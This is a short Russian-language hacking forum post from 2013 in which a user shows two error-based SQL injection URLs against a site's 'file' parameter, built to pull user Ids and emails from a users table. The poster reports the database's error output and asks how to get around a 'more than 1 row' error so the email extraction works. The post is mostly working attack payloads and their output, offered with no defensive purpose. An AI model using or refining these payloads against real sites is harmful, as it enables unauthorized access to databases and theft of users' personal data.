Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #11  
Старый 02.10.2013, 17:46
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию
Вобщем делаю sql запрос:

site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Id ,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limi t+0,1)+)+from+`information_schema`.tables+limit+0, 1),floor(rand(0)*2))x+from+`information_schema`.ta bles+group+by+x)a)+and+1=1

На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.

Делаем еще один запрос:

site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Em ail,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+l imit+0,1)+)+from+`information_schema`.tables+limit +0,1),floor(rand(0)*2))x+from+`information_schema` .tables+group+by+x)a)+and+1=1

На что мне выдает: Subquery returns more than 1 row - чертов лимин(((

Подскажите, как выполнить второй запрос - чтобы избежать лимита.
 
Ответить с цитированием